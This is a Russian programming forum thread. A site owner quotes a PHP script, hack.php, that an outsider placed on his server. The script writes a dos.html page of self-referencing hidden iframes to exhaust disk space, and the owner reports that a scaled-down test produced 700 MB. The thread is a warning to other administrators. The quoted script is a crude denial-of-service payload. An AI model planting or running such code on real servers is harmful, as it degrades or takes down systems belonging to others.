VPF::Как организуется простой ddos - Форум программистов

ctpz

Дата 29.12.2011, 20:05 (ссылка)

(нет голосов)

Загрузка ...

Новичок

Профиль
Группа: Участник
Сообщений: 23
Регистрация: 27.12.2011

Репутация: нет
Всего: нет

Сегодня заметил резкое увеличение страниц своего сайта в гугле. Порывшись в логах обнаружил обращения к файлу dos.html и hack.php к первому от гугла, а ко второму от стороннего лица.

Код hack.php (действительн так сервать можно загнать)

Код


max_execution_time = 1000000000000;
$file = "<html><head><title>I am hacked you server!</title></head><body><h1 align='center'>I am hacked this server</h1>";
$j = 0;
chdir('/');
$src = fopen('dos.html', 'w');
fwrite($src, $file);
while ($j < 300000){
fwrite($src, "<iframe src='dos.html' width='0' height='0'></iframe>");
}
fwrite($src, "</body></html>");
fclose($src);

Для эксперимента запустил этот файл у себя на денвере, уменьшив число в цикле в 1000 раз. Реальный объем результата меня поразил. 700 Мб. Офигеть. Будьте бдительны!

Это сообщение отредактировал(а) ctpz - 30.12.2011, 15:23

500mhz

Дата 30.12.2011, 10:29 (ссылка)

(нет голосов)

Загрузка ...

шайтан

Профиль
Группа: Завсегдатай
Сообщений: 1017
Регистрация: 5.5.2008
Где: Киев / Italy

Репутация: нет
Всего: 14

и?

--------------------

ctpz

Дата 30.12.2011, 15:24 (ссылка)

(нет голосов)

Загрузка ...

Новичок

Профиль
Группа: Участник
Сообщений: 23
Регистрация: 27.12.2011

Репутация: нет
Всего: нет

Просто рассказал, что даже 11 строк кода могут опустить сервера надолго.

0 Пользователей читают эту тему (0 Гостей и 0 Скрытых Пользователей)
0 Пользователей:
« Предыдущая тема \| Администрирование Web серверов и Web служб \| Следующая тема »